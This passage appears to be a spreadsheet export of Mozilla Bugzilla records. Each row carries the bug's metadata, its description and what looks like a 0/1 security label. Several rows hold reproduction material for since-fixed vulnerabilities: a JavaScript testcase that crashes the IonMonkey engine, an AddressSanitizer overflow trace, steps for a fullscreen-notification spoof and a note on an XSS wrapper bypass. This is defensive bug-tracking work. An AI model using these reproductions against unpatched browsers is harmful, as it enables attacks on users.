          <t>113 Branch</t>
        </is>
      </c>
      <c r="T3776" t="n">
        <v>1</v>
      </c>
      <c r="U3776" t="n">
        <v>0</v>
      </c>
      <c r="V3776" t="n">
        <v>12</v>
      </c>
      <c r="W3776" t="inlineStr">
        <is>
          <t>Created attachment 9322281
video_2023-03-10_10-13-41.mp4
I found a vulnerability in firefox android where a safety browsing alert notification can cover fullscreen notifications which can lead to spoofs. i tested after fixed: https://github.com/mozilla-mobile/firefox-android/pull/1133 ( https://bugzilla.mozilla.org/show_bug.cgi?id=1819254 )
steps to produce
1, open http://103.186.0.20/focus.html or firefox.html
2. click on "go to google" button , (when the button clicked it show safety browsing alert it covers the fullscreen notification)
OS: Android 10 (Samsung M31)
i attached the poc video files.
thank you</t>
        </is>
      </c>
      <c r="X3776" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3777">
      <c r="A3777" t="n">
        <v>450694</v>
      </c>
      <c r="B3777" t="inlineStr">
        <is>
          <t>2008-08-14 18:14:29 -0700</t>
        </is>
      </c>
      <c r="C3777" t="inlineStr">
        <is>
          <t>deb packaging not compatible between fennec and xr</t>
        </is>
      </c>
      <c r="D3777" t="inlineStr">
        <is>
          <t>2009-08-21 12:10:36 -0700</t>
        </is>
      </c>
      <c r="E3777" t="n">
        <v>1</v>
      </c>
      <c r="F3777" t="n">
        <v>1</v>
      </c>
      <c r="G3777" t="n">
        <v>6</v>
      </c>
      <c r="H3777" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I3777" t="inlineStr">
        <is>
          <t>Firefox for Android Graveyard</t>
        </is>
      </c>
      <c r="J3777" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K3777" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3777" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M3777" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N3777" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3777" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3777" t="inlineStr"/>
      <c r="Q3777" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3777" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3777" t="inlineStr">
        <is>
          <t>fennec1.0a1</t>
        </is>
      </c>
      <c r="T3777" t="n">
        <v>1</v>
      </c>
      <c r="U3777" t="n">
        <v>0</v>
      </c>
      <c r="V3777" t="n">
        <v>4</v>
      </c>
      <c r="W3777" t="inlineStr">
        <is>
          <t>build from the tree today, make deb, copied for .debs to device.
Nokia-N810-23-14:/media/mmc1# dpkg -i fennec_0.6_armel.deb                                               
(Reading database ... 16932 files and directories currently installed.)
Preparing to replace fennec 0.6 (using fennec_0.6_armel.deb) ...
Unpacking replacement fennec ...
dpkg: dependency problems prevent configuration of fennec:
 fennec depends on xulrunner (&gt;= 1.9.1a2pre-20080812181220); however:
  Version of xulrunner on system is 1.9.1a2pre-20080812063430.
dpkg: error processing fennec (--install):
 dependency problems - leaving unconfigured
Errors were encountered while processing:
 fennec</t>
        </is>
      </c>
      <c r="X3777" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3778">
      <c r="A3778" t="n">
        <v>665251</v>
      </c>
      <c r="B3778" t="inlineStr">
        <is>
          <t>2011-06-17 19:05:44 -0700</t>
        </is>
      </c>
      <c r="C3778" t="inlineStr">
        <is>
          <t>500 / Internal Server Errors on Elastic-Search-running staging</t>
        </is>
      </c>
      <c r="D3778" t="inlineStr">
        <is>
          <t>2011-12-28 10:40:11 -0800</t>
        </is>
      </c>
      <c r="E3778" t="n">
        <v>1</v>
      </c>
      <c r="F3778" t="n">
        <v>1</v>
      </c>
      <c r="G3778" t="n">
        <v>4</v>
      </c>
      <c r="H3778" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I3778" t="inlineStr">
        <is>
          <t>Socorro</t>
        </is>
      </c>
      <c r="J3778" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K3778" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3778" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3778" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3778" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3778" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3778" t="inlineStr"/>
      <c r="Q3778" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3778" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3778" t="inlineStr">
        <is>
          <t>2.0</t>
        </is>
      </c>
      <c r="T3778" t="n">
        <v>1</v>
      </c>
      <c r="U3778" t="n">
        <v>0</v>
      </c>
      <c r="V3778" t="n">
        <v>27</v>
      </c>
      <c r="W3778" t="inlineStr">
        <is>
          <t>Created attachment 540197
Logfile
The new Elastic Search integration is throwing a ton of 500 Internal Server Errors on staging:
https://crash-stats.allizom.org/products/Firefox
Will include output from PowerFuzzer.</t>
        </is>
      </c>
      <c r="X3778" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3779">
      <c r="A3779" t="n">
        <v>1141959</v>
      </c>
      <c r="B3779" t="inlineStr">
        <is>
          <t>2015-03-11 02:22:28 -0700</t>
        </is>
      </c>
      <c r="C3779" t="inlineStr">
        <is>
          <t>nsIPrincipal.origin mishandles IPv6 host literals</t>
        </is>
      </c>
      <c r="D3779" t="inlineStr">
        <is>
          <t>2020-12-18 17:01:10 -0800</t>
        </is>
      </c>
      <c r="E3779" t="n">
        <v>1</v>
      </c>
      <c r="F3779" t="n">
        <v>1</v>
      </c>
      <c r="G3779" t="n">
        <v>3</v>
      </c>
      <c r="H3779" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3779" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3779" t="inlineStr">
        <is>
          <t>Security: CAPS</t>
        </is>
      </c>
      <c r="K3779" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3779" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3779" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3779" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3779" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3779" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main76+]</t>
        </is>
      </c>
      <c r="Q3779" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R3779" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3779" t="inlineStr">
        <is>
          <t>mozilla76</t>
        </is>
      </c>
      <c r="T3779" t="n">
        <v>1</v>
      </c>
      <c r="U3779" t="n">
        <v>0</v>
      </c>
      <c r="V3779" t="n">
        <v>16</v>
      </c>
      <c r="W3779" t="inlineStr">
        <is>
          <t>For codebase URIs with IPv6 host literals like
http://[::1]/
nsPrincipal::GetOriginForURI() returns
http:/::1/
because it just concatenates nsIURI.scheme + "://" + nsIURI.asciiHost + ":" + nsIURI.port, "forgetting" to special case IPv6 hosts enclosing them with brackets.
This gets especially confusing and likely unsafe when explicit ports are added to the mix, potentially producing invalid URIs and/or duplicate strings for actually different origins.</t>
        </is>
      </c>
      <c r="X3779" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3780">
      <c r="A3780" t="n">
        <v>780979</v>
      </c>
      <c r="B3780" t="inlineStr">
        <is>
          <t>2012-08-07 13:12:40 -0700</t>
        </is>
      </c>
      <c r="C3780" t="inlineStr">
        <is>
          <t>Out-of-bounds-read in CharDistributionAnalysis::HandleOneChar</t>
        </is>
      </c>
      <c r="D3780" t="inlineStr">
        <is>
          <t>2013-04-30 18:57:50 -0700</t>
        </is>
      </c>
      <c r="E3780" t="n">
        <v>1</v>
      </c>
      <c r="F3780" t="n">
        <v>1</v>
      </c>
      <c r="G3780" t="n">
        <v>3</v>
      </c>
      <c r="H3780" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3780" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3780" t="inlineStr">
        <is>
          <t>Internationalization</t>
        </is>
      </c>
      <c r="K3780" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3780" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M3780" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3780" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3780" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3780" t="inlineStr">
        <is>
          <t>[asan][adv-main18+]</t>
        </is>
      </c>
      <c r="Q3780" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3780" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3780" t="inlineStr">
        <is>
          <t>mozilla18</t>
        </is>
      </c>
      <c r="T3780" t="n">
        <v>1</v>
      </c>
      <c r="U3780" t="n">
        <v>0</v>
      </c>
      <c r="V3780" t="n">
        <v>10</v>
      </c>
      <c r="W3780" t="inlineStr">
        <is>
          <t>Created attachment 649768
Testcase
Reproduces on trunk.
=================================================================
==30575== ERROR: AddressSanitizer global-buffer-overflow on address 0x7f058130ac5e at pc 0x7f0574303e43 bp 0x7fff591310d0 sp 0x7fff591310c8
READ of size 2 at 0x7f058130ac5e thread T0
    #0 0x7f0574303e43 in CharDistributionAnalysis::HandleOneChar(char const*, unsigned int) firefox/src/extensions/universalchardet/src/base/CharDistribution.h:37
    #1 0x7f05743099bd in nsEUCTWProber::HandleData(char const*, unsigned int) firefox/src/extensions/universalchardet/src/base/nsEUCTWProber.cpp:41
    #2 0x7f0574313ac2 in nsMBCSGroupProber::HandleData(char const*, unsigned int) firefox/src/extensions/universalchardet/src/base/nsMBCSGroupProber.cpp:125
    #3 0x7f05743297d6 in nsUniversalDetector::HandleData(char const*, unsigned int) firefox/src/extensions/universalchardet/src/base/nsUniversalDetector.cpp:181
    #4 0x7f05742f2125 in nsXPCOMDetector::DoIt(char const*, unsigned int, bool*) firefox/src/extensions/universalchardet/src/xpcom/nsUdetXPCOMWrapper.cpp:57
    #5 0x7f05742f281d in non-virtual thunk to nsXPCOMDetector::DoIt(char const*, unsigned int, bool*) asn1cmn.c:0
    #6 0x7f056cd55281 in nsContentUtils::GuessCharset(char const*, unsigned int, nsACString_internal&amp;) firefox/src/content/base/src/nsContentUtils.cpp:3628
    #7 0x7f056ceab216 in nsDOMFileReader::GetAsText(nsACString_internal const&amp;, char const*, unsigned int, nsAString_internal&amp;) firefox/src/content/base/src/nsDOMFileReader.cpp:444
    #8 0x7f056ceaa7c4 in nsDOMFileReader::DoOnStopRequest(nsIRequest*, nsISupports*, unsigned int, nsAString_internal&amp;, nsAString_internal&amp;) firefox/src/content/base/src/nsDOMFileReader.cpp:357
    #9 0x7f056d5cc66c in mozilla::dom::FileIOObject::OnStopRequest(nsIRequest*, nsISupports*, unsigned int) firefox/src/content/base/src/FileIOObject.cpp:206
    #10 0x7f056d5ccefd in non-virtual thunk to mozilla::dom::FileIOObject::OnStopRequest(nsIRequest*, nsISupports*, unsigned int) asn1cmn.c:0
    #11 0x7f0569d80c4a in nsBaseChannel::OnStopRequest(nsIRequest*, nsISupports*, unsigned int) firefox/src/netwerk/base/src/nsBaseChannel.cpp:720
    #12 0x7f0569d8102d in non-virtual thunk to nsBaseChannel::OnStopRequest(nsIRequest*, nsISupports*, unsigned int) asn1cmn.c:0
    #13 0x7f0569e2384a in nsInputStreamPump::OnStateStop() firefox/src/netwerk/base/src/nsInputStreamPump.cpp:556
    #14 0x7f0569e203c5 in nsInputStreamPump::OnInputStreamReady(nsIAsyncInputStream*) firefox/src/netwerk/base/src/nsInputStreamPump.cpp:373
    #15 0x7f0569e23c4f in non-virtual thunk to nsInputStreamPump::OnInputStreamReady(nsIAsyncInputStream*) asn1cmn.c:0
    #16 0x7f05768e898e in nsInputStreamReadyEvent::Run() firefox/src/xpcom/io/nsStreamUtils.cpp:82
    #17 0x7f05769fcbfd in nsThread::ProcessNextEvent(bool, bool*) firefox/src/xpcom/threads/nsThread.cpp:625
    #18 0x7f057668b46d in NS_ProcessNextEvent_P(nsIThread*, bool) firefox/src/objdir-ff-asan-sym/xpcom/build/nsThreadUtils.cpp:220
    #19 0x7f0575540e96 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) firefox/src/ipc/glue/MessagePump.cpp:82
    #20 0x7f0576cb070a in MessageLoop::RunInternal() firefox/src/ipc/chromium/src/base/message_loop.cc:209
    #21 0x7f0576cb0553 in MessageLoop::RunHandler() firefox/src/ipc/chromium/src/base/message_loop.cc:202
    #22 0x7f0576cb0438 in MessageLoop::Run() firefox/src/ipc/chromium/src/base/message_loop.cc:176
    #23 0x7f05749f4f1e in nsBaseAppShell::Run() firefox/src/widget/xpwidgets/nsBaseAppShell.cpp:165
    #24 0x7f057363fb38 in nsAppStartup::Run() firefox/src/toolkit/components/startup/nsAppStartup.cpp:271
    #25 0x7f0569c40f60 in XREMain::XRE_mainRun() firefox/src/toolkit/xre/nsAppRunner.cpp:3798
    #26 0x7f0569c47902 in XREMain::XRE_main(int, char**, nsXREAppData const*) firefox/src/toolkit/xre/nsAppRunner.cpp:3875
    #27 0x7f0569c4add2 in XRE_main firefox/src/toolkit/xre/nsAppRunner.cpp:3951
    #28 0x40c28f in do_main(int, char**) firefox/src/browser/app/nsBrowserApp.cpp:174
    #29 0x409cbd in main firefox/src/browser/app/nsBrowserApp.cpp:279
    #30 0x7f0586e35c4d in ?? ??:0
0x7f058130ac5e is located 30 bytes to the right of global variable 'EUCTWCharToFreqOrder (firefox/src/extensions/universalchardet/src/base/CharDistribution.cpp)' (0x7f0581308240) of size 10752
==30575== ABORTING
Stats: 238M malloced (252M for red zones) by 382140 calls
Stats: 42M realloced by 19486 calls
Stats: 199M freed by 250896 calls
Stats: 66M really freed by 170600 calls
Stats: 440M (112717 full pages) mmaped in 110 calls
  mmaps   by size class: 8:278511; 9:40955; 10:16380; 11:14329; 12:2048; 13:2048; 14:1280; 15:256; 16:448; 17:1280; 18:128; 19:40; 20:16;
  mallocs by size class: 8:297871; 9:44986; 10:15483; 11:15613; 12:2123; 13:2131; 14:1393; 15:307; 16:536; 17:1485; 18:150; 19:48; 20:14;
  frees   by size class: 8:183583; 9:36302; 10:12152; 11:12696; 12:1450; 13:1216; 14:1203; 15:254; 16:453; 17:1472; 18:59; 19:45; 20:11;
  rfrees  by size class: 8:135364; 9:18346; 10:7215; 11:7785; 12:438; 13:437; 14:235; 15:144; 16:339; 17:256; 18:29; 19:11; 20:1;
Stats: malloc large: 1697 small slow: 1873
Shadow byte and word:
  0x1fe0b026158b: f9
  0x1fe0b0261588: f9 f9 f9 f9 00 00 00 00
More shadow bytes:
  0x1fe0b0261568: 00 00 00 00 00 00 00 00
  0x1fe0b0261570: 00 00 00 00 00 00 00 00
  0x1fe0b0261578: 00 00 00 00 00 00 00 00
  0x1fe0b0261580: 00 00 00 00 00 00 00 00
=&gt;0x1fe0b0261588: f9 f9 f9 f9 00 00 00 00
  0x1fe0b0261590: 00 00 00 00 00 00 00 00
  0x1fe0b0261598: 00 00 00 00 00 00 00 00
  0x1fe0b02615a0: 00 00 00 00 00 00 00 00
  0x1fe0b02615a8: 00 00 00 00 00 00 00 00</t>
        </is>
      </c>
      <c r="X3780" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3781">
      <c r="A3781" t="n">
        <v>957138</v>
      </c>
      <c r="B3781" t="inlineStr">
        <is>
          <t>2014-01-07 06:57:32 -0800</t>
        </is>
      </c>
      <c r="C3781" t="inlineStr">
        <is>
          <t>update cache settings</t>
        </is>
      </c>
      <c r="D3781" t="inlineStr">
        <is>
          <t>2014-01-23 12:10:35 -0800</t>
        </is>
      </c>
      <c r="E3781" t="n">
        <v>1</v>
      </c>
      <c r="F3781" t="n">
        <v>1</v>
      </c>
      <c r="G3781" t="n">
        <v>5</v>
      </c>
      <c r="H3781" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I3781" t="inlineStr">
        <is>
          <t>support.mozilla.org</t>
        </is>
      </c>
      <c r="J3781" t="inlineStr">
        <is>
          <t>Code Quality</t>
        </is>
      </c>
      <c r="K3781" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3781" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3781" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3781" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3781" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3781" t="inlineStr">
        <is>
          <t>u=dev c=general p=0 s=2014.2</t>
        </is>
      </c>
      <c r="Q3781" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R3781" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3781" t="inlineStr">
        <is>
          <t>2014Q1</t>
        </is>
      </c>
      <c r="T3781" t="n">
        <v>1</v>
      </c>
      <c r="U3781" t="n">
        <v>0</v>
      </c>
      <c r="V3781" t="n">
        <v>4</v>
      </c>
      <c r="W3781" t="inlineStr">
        <is>
          <t>When trying to use Django 1.5, this shows up in the output:
/home/willkg/mozilla/kitsune/vendor/src/django/django/core/cache/backends/memcached.py:146: DeprecationWarning: memcached.CacheClass has been split into memcached.MemcachedCache and memcached.PyLibMCCache. Please update your cache backend setting.
It seems like we can keep using our existing cache settings with Django 1.5, but I don't know if there are ramifications for not updating them and I don't know when the deprecation turns into a "THOU SHALT NOT PASS!" Ergo, I think it behooves us to update them right after we update to Django 1.5.</t>
        </is>
      </c>
      <c r="X3781" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3782">
      <c r="A3782" t="n">
        <v>330884</v>
      </c>
      <c r="B3782" t="inlineStr">
        <is>
          <t>2006-03-17 15:48:21 -0800</t>
        </is>
      </c>
      <c r="C3782" t="inlineStr">
        <is>
          <t>When different users on one system choose to save or not save passwords for sites, any other user can see sites they not only saved passwords for but can also see what other users have been saving/never saving passwords for.</t>
        </is>
      </c>
      <c r="D3782" t="inlineStr">
        <is>
          <t>2024-06-07 13:12:39 -0700</t>
        </is>
      </c>
      <c r="E3782" t="n">
        <v>1</v>
      </c>
      <c r="F3782" t="n">
        <v>1</v>
      </c>
      <c r="G3782" t="n">
        <v>3</v>
      </c>
      <c r="H3782" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3782" t="inlineStr">
        <is>
          <t>Toolkit</t>
        </is>
      </c>
      <c r="J3782" t="inlineStr">
        <is>
          <t>Password Manager</t>
        </is>
      </c>
      <c r="K3782" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3782" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M3782" t="inlineStr">
        <is>
          <t>Windows XP</t>
        </is>
      </c>
      <c r="N3782" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3782" t="inlineStr">
        <is>
          <t>DUPLICATE</t>
        </is>
      </c>
      <c r="P3782" t="inlineStr"/>
      <c r="Q3782" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3782" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S3782" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3782" t="n">
        <v>0</v>
      </c>
      <c r="U3782" t="n">
        <v>1</v>
      </c>
      <c r="V3782" t="n">
        <v>38</v>
      </c>
      <c r="W3782" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1
This privacy flaw has caused my fiancé and I to break-up after having dated for 5 years.
Basically, we share one computer but under separate Windows XP user accounts.  We both use Mozilla Firefox -- well, he used to use it more than I do but now we don't really use it.  The privacy flaw is this: when he went to log-in under his dating sites (jdate.com, swinglifestyle.com, adultfriendfinder.com, etc.), Mozilla promptly asks whether or not he'd like Firefox to save the passwords for him.  He chose never, obviously.  However, when he logged off his user account, and I logged onto my Windows XP account X amount of days later, I decided to use Firefox because hey -- it loaded everything much more efficiently, was better to work on with website designs and is a lot more stable than IE7beta2.
Firefox prompted whether or not I'd like it to save my password for logging into my website.  I chose never and changed my mind.  I went into the Password Manager to change the saved password option from Never to Always and that's when I saw all these other sites that had been selected as "Never Save Password."  Of course, those were sites I had never visited or could ever dream of visiting.
Then I realized who, how and what...  and sh*t hit the fan.  Your browser does not efficiently respect the privacy of different users for one system.
Reproducible: Always
Steps to Reproduce:
1. Create 2 unique user accounts (for steps sake, let's call the two accounts Joe and Mary) in Windows XP Home.
2. Logout and sign-in under Joe.
3. Open Firefox and go to an e-mail site or to jdate.com or wherever.
4. Attempt to log-in to the site so that Firefox will ask whether or not you want your password saved.
5. Choose not to save the password.
6. After successfully logging in and having selected the "never save password" option, logout.
7. Log-in as Mary and open Firefox.
8. Browse, browse, browse... but you don't really have to.  Just go to "View Saved Passwords," click on the tab that will show you sites to never save passwords for, and you'll see whatever painful site Joe denied to save a password for.
9. Break-up with fiancé.
Firefox should be respecting every single area of privacy per user on one system.  It's not doing that...  I'm going to submit this as Major because not everyone shares one computer, but it should really be considered Critical.</t>
        </is>
      </c>
      <c r="X3782" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3783">
      <c r="A3783" t="n">
        <v>1444533</v>
      </c>
      <c r="B3783" t="inlineStr">
        <is>
          <t>2018-03-09 14:06:13 -0800</t>
        </is>
      </c>
      <c r="C3783" t="inlineStr">
        <is>
          <t>Remove HBaseAddonRecommenderView</t>
        </is>
      </c>
      <c r="D3783" t="inlineStr">
        <is>
          <t>2018-03-16 15:18:04 -0700</t>
        </is>
      </c>
      <c r="E3783" t="n">
        <v>1</v>
      </c>
      <c r="F3783" t="n">
        <v>1</v>
      </c>
      <c r="G3783" t="n">
        <v>2</v>
      </c>
      <c r="H3783" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I3783" t="inlineStr">
        <is>
          <t>Data Platform and Tools</t>
        </is>
      </c>
      <c r="J3783" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K3783" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3783" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3783" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3783" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3783" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3783" t="inlineStr"/>
      <c r="Q3783" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3783" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3783" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3783" t="n">
        <v>1</v>
      </c>
      <c r="U3783" t="n">
        <v>0</v>
      </c>
      <c r="V3783" t="n">
        <v>1</v>
      </c>
      <c r="W3783" t="inlineStr">
        <is>
          <t>This job is no longer in use, and can no longer be run in production now that the HBase cluster has been decomissioned. This can free up the dependencies in the telemetry-batch-view project.</t>
        </is>
      </c>
      <c r="X3783" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3784">
      <c r="A3784" t="n">
        <v>799803</v>
      </c>
      <c r="B3784" t="inlineStr">
        <is>
          <t>2012-10-09 18:58:37 -0700</t>
        </is>
      </c>
      <c r="C3784" t="inlineStr">
        <is>
          <t>IonMonkey: Crash [@ JSString::isAtom] with invalid read</t>
        </is>
      </c>
      <c r="D3784" t="inlineStr">
        <is>
          <t>2013-11-25 13:20:18 -0800</t>
        </is>
      </c>
      <c r="E3784" t="n">
        <v>1</v>
      </c>
      <c r="F3784" t="n">
        <v>1</v>
      </c>
      <c r="G3784" t="n">
        <v>3</v>
      </c>
      <c r="H3784" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3784" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3784" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K3784" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3784" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M3784" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N3784" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3784" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3784" t="inlineStr">
        <is>
          <t>[ion:p1:fx19] [jsbugmon:] [adv-main19+]</t>
        </is>
      </c>
      <c r="Q3784" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3784" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3784" t="inlineStr">
        <is>
          <t>mozilla19</t>
        </is>
      </c>
      <c r="T3784" t="n">
        <v>1</v>
      </c>
      <c r="U3784" t="n">
        <v>0</v>
      </c>
      <c r="V3784" t="n">
        <v>20</v>
      </c>
      <c r="W3784" t="inlineStr">
        <is>
          <t>The following testcase crashes on mozilla-central revision 22d192c5d1fd (run with --ion-eager):
var gTestcases = new Array();
var gTc = gTestcases.length;
function TestCase(n, d, e, a) {
  this.bugnumber = typeof(BUGNUMER) != 'undefined' ? BUGNUMBER : '';
  gTestcases[gTc++] = this;
  TestCase.prototype.dump = function () {
	+ this.path + this.bugnumber + 'reason: '
  }
};
function reportCompare (expected, actual, description) {
  var testcase = new TestCase();
}
function exitFunc (funcName) {
  reportCompare();
}
function jsTestDriverEnd() {
  for (var i = 0; i &lt; gTestcases.length; i++)
    gTestcases[i].dump();
}
evaluate("\
new TestCase ();\
new TestCase ();\
var BUGNUMBER = 359062;\
schedulegc(10);\
jsTestDriverEnd();\
print(expect = BUGNUMER  = 'Test skipped. Script object required.');\
exitFunc ('test');\
jsTestDriverEnd();\
", { noScriptRval : true });</t>
        </is>
      </c>
      <c r="X3784" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3785">
      <c r="A3785" t="n">
        <v>478433</v>
      </c>
      <c r="B3785" t="inlineStr">
        <is>
          <t>2009-02-13 09:40:10 -0800</t>
        </is>
      </c>
      <c r="C3785" t="inlineStr">
        <is>
          <t>XPCNativeWrapper's toString's __proto__ comes from the wrong scope</t>
        </is>
      </c>
      <c r="D3785" t="inlineStr">
        <is>
          <t>2010-02-13 12:45:08 -0800</t>
        </is>
      </c>
      <c r="E3785" t="n">
        <v>1</v>
      </c>
      <c r="F3785" t="n">
        <v>1</v>
      </c>
      <c r="G3785" t="n">
        <v>3</v>
      </c>
      <c r="H3785" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3785" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3785" t="inlineStr">
        <is>
          <t>XPConnect</t>
        </is>
      </c>
      <c r="K3785" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3785" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M3785" t="inlineStr">
        <is>
          <t>Windows XP</t>
        </is>
      </c>
      <c r="N3785" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3785" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3785" t="inlineStr">
        <is>
          <t>[sg:high]</t>
        </is>
      </c>
      <c r="Q3785" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R3785" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3785" t="inlineStr">
        <is>
          <t>mozilla1.9.1</t>
        </is>
      </c>
      <c r="T3785" t="n">
        <v>1</v>
      </c>
      <c r="U3785" t="n">
        <v>0</v>
      </c>
      <c r="V3785" t="n">
        <v>17</v>
      </c>
      <c r="W3785" t="inlineStr">
        <is>
          <t>This is a similar problem to bug 370127.  If chrome code calls
content.toString.call(), then content-defined functions can be called by chrome
code.  Also, it's possible to use this bug to bypass XOW and perform bug
369334's XSS attack.</t>
        </is>
      </c>
      <c r="X3785" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3786">
      <c r="A3786" t="n">
        <v>595230</v>
      </c>
      <c r="B3786" t="inlineStr">
        <is>
          <t>2010-09-10 10:08:36 -0700</t>
        </is>
      </c>
      <c r="C3786" t="inlineStr">
        <is>
          <t>Crash [@ EscapeAttributeValue] or "Assertion failure: JSVAL_TO_OBJECT(nsval)-&gt;getClass() == &amp;js_NamespaceClass,"</t>
        </is>
      </c>
      <c r="D3786" t="inlineStr">
        <is>
          <t>2013-01-04 13:22:28 -0800</t>
        </is>
